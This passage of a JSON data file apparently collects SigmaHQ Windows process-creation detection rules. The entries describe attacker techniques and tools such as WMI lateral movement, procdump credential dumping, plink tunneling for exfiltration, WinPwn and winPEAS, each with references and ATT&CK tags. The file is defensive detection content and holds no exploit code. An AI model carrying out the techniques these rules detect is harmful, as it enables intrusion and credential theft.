Neis @Karneades", "creation_date": "2019-04-03", "falsepositive": [ "AppvClient", "CCM", "WinRM" ], "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"692f0bec-83ba-4d04-af7e-e884a96059b6", "value": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell" }, { "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", "value": "User Discovery And Export Via Get-ADUser Cmdlet" }, { "description": "Detect filter driver unloading activity via fltmc.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_fltmc_unload_driver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml" ], 
"tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4931188c-178e-4ee7-a348-39e8a7a56821", "value": "Filter Driver Unloaded Via Fltmc.EXE" }, { "description": "Detects the use of powershell commands from headless ConHost window.\nThe \"--headless\" flag hides the windows from the user upon execution.\n", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_headless_powershell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1059.001", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "056c7317-9a09-4bd4-9067-d051312752ea", "value": "Powershell Executed From Headless ConHost Process" }, { "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "meta": { "author": 
"Florian Roth (Nextron Systems)", "creation_date": "2021-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_whoami.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "value": "Renamed Whoami Execution" }, { "description": "Detects commandline keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-12-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_winpwn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.discovery", "attack.execution", "attack.privilege-escalation", "attack.t1046", 
"attack.t1082", "attack.t1106", "attack.t1518", "attack.t1548.002", "attack.t1552.001", "attack.t1555", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d557dc06-62e8-4468-a8e8-7984124908ce", "value": "HackTool - WinPwn Execution" }, { "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "meta": { "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_child_process_as_system_.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/antonioCoco/RogueWinRM", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "value": "Suspicious Child Process Created as System" }, { "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msdt_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", "value": "Suspicious MSDT Parent Process" }, { "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to 
hide malicious files", "meta": { "author": "frack113", "creation_date": "2022-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_icacls_deny.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", "value": "Use Icacls to Hide File to Everyone" }, { "description": "WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", "meta": { "author": "Georg Lauenstein (sure[secure])", "creation_date": "2022-09-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_winpeas.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1082", "attack.t1087", "attack.t1046" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", "value": "HackTool - winPEAS Execution" }, { "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Other parent binaries using GUP not currently identified" ], "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535322445439180803", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", "value": "Arbitrary Binary Execution Using GUP Utility" }, { "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "meta": { "author": "frack113", "creation_date": "2022-11-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powercfg_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" }, { "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", "meta": { "author": "Hieu Tran", "creation_date": "2023-03-13", "falsepositive": [ "Legitimate 
administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "filename": "proc_creation_win_powershell_decode_gzip.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98767d61-b2e8-4d71-b661-e36783ee24c1", "value": "Gzip Archive Decode Via PowerShell" }, { "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_susp_grpconv.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1526833181831200770", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", "value": "Suspicious GrpConv Execution" }, { "description": "Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. 
This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_inline_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1478116126005641220", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", "value": "File Download From Browser Process Via Inline URL" }, { "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "filename": "proc_creation_win_pressanykey_lolbin_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", "https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": 
[ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", "value": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution" }, { "description": "Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_ping_copy_combined_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ded2b07a-d12f-4284-9b76-653e37b6c8b0", "value": "Potentially Suspicious Ping/Copy Command Combination" }, { "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Discord" ], "filename": "proc_creation_win_reg_query_registry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_query_registry.yml" ], "tags": [ "attack.discovery", "attack.t1012", "attack.t1007" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", "value": "Potential Configuration And Service Reconnaissance Via Reg.EXE" }, { "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used for domain trust discovery to plan out subsequent steps in the attack chain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_adfind.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://www.joeware.net/freetools/tools/adfind/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002", "attack.t1482", "attack.t1069.002" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "value": "Renamed AdFind Execution" }, { "description": "Detects usage of the SysInternals Procdump utility", "meta": { "author": "Florian Roth 
(Nextron Systems)", "creation_date": "2021-08-16", "falsepositive": [ "Legitimate use of procdump by a developer or administrator" ], "filename": "proc_creation_win_sysinternals_procdump.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "value": "Procdump Execution" }, { "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-01", "falsepositive": [ "Legitimate import of keys" ], "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" ], "tags": [ "attack.t1112", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", "value": "Potential Suspicious Registry File Imported Via Reg.EXE" }, { "description": "Detects the 
execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_hotfix.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "value": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE" }, { "description": "Execution of plink to perform data exfiltration and tunneling", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_plink_susp_tunneling.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "value": "Potential RDP Tunneling Via Plink" }, { "description": "Detects the execution of a renamed \"cloudflared\" binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_cloudflared.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "value": "Renamed Cloudflared.EXE Execution" }, { "description": "Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Legitimate usage of Adplus for debugging purposes" ], "filename": "proc_creation_win_adplus_memory_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1534916659676422152", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", "https://twitter.com/nas_bench/status/1534915321856917506", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", "value": "Potential Adplus.EXE Abuse" }, { "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", "meta": { "author": "frack113", "creation_date": "2022-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_printbrm.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" ], "tags": [ "attack.command-and-control", "attack.t1105", "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "value": "PrintBrm ZIP Creation of Extraction" }, { "description": "Detects usage of Gpg4win to decrypt files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_decryption.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" ], "tags": [ "attack.execution" ] }, "uuid": "037dcd71-33a8-4392-bb01-293c94663e5a", "value": "File Decryption Using Gpg4win" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
